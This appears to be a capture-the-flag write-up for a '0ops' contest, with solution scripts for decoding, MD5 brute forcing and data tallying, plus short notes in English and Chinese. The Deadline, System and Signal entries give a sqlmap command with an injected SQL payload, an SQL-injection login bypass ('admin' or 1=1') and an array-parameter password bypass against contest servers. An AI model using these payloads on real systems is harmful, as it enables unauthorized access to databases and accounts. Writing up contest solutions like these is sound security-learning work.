Johncode
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:decode.py
import hashlib
def decode(msg, key):
msg = msg.decode('rot13').decode('base64')
token = hashlib.md5(key).digest()
res = ""
password = "0ops Capture The Flag"
for c in msg:
#print ord(c)
n = ord(c) ^ 0xde ^ 0xad ^ 0xbe ^ 0xef
for i in xrange(16):
n ^= ord(password[i]) ^ ord(token[i])
res += chr(n)
token = hashlib.md5(c).digest()
return res
if __name__ == "__main__":
print "Johncode ans: ",decode("eaxRa8RO8gyXLs/5lZO2jUk32bGGN9DoA5hi1MBswPnWw28pk2f=","test")
Dict
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:dict.py
little = "abcdefghijklmnopqrstuvwxyz"
hash = 'e79dc003a53edc551c5ef8364e97b2e2'
def is_hash(word):
import hashlib
m = hashlib.md5()
m.update(word+"0ops!^_^")
t_hash = m.hexdigest()
if t_hash == hash:
print "md5( " + word + "0ops!^_^ ) = " + hash
def r_list(filename):
fb = open(filename, "r")
for w in fb.readlines():
is_hash(w[:-1])
def attack():
l_word = [ a+b+c+d for a in little for b in little for c in little for d in little ]
map(lambda s: is_hash(s), l_word)
if __name__ == '__main__':
#r_list("word.txt")
attack()
IPv4
#!/usr/bin/awk -f
#script:ipv4.sh
#usage:ipv4.sh assigned-apnic-20140223 or ipv4.sh delegated-apnic-latest
BEGIN{
FS="|"
IGNORECASE=1
num=0
}
{
if (NR>=28 && $2~/CN/ && $3~/ipv4/ && $6<=20140223)
{
num+=$5
}
}
END{
print "IPv4 ans: "num
}
FakeUser
#!/bin/bash
#script:fakeuser.sh
cat kitty.sql | grep -r $'\r' > kitty_1.sql 2>/dev/null
ans=`cat kitty_1.sql|sed 's/(standard input):(//'|awk 'BEGIN{FS=",";num=0;}{if( NR>=1 && $1~/^[0-9]+$/){num+=$1;}}END{print num;}'`
ans1=`echo -n $ans | md5`
echo "0ops{"$ans1"}"
Deadline
$ sqlmap -u "http://202.120.7.105:888/?getdeadlineof=1%0Aand%0A1=1" -p "getdeadlineof" --dbms "MySQL" --sql-shell
Spy
送分题
第一关:改数据包
第二关:多提交几次999,中奖概率很高
第三关:提交0或1e111
第四关:十六进制
System
http://202.120.7.107:888/login.php
POST:
username=admin' or 1=1 or '&password=aaaaaaaa
Classic
一开始以为是变形字符,尝试匹配之后不对
后来看是不是分组加密,也不是
最后竟然是滚键盘!!!
Signal
http://202.120.7.106/login_ok.php
POST:
id=222.18.127.138&ps[]=aaaa
Onlyadmin
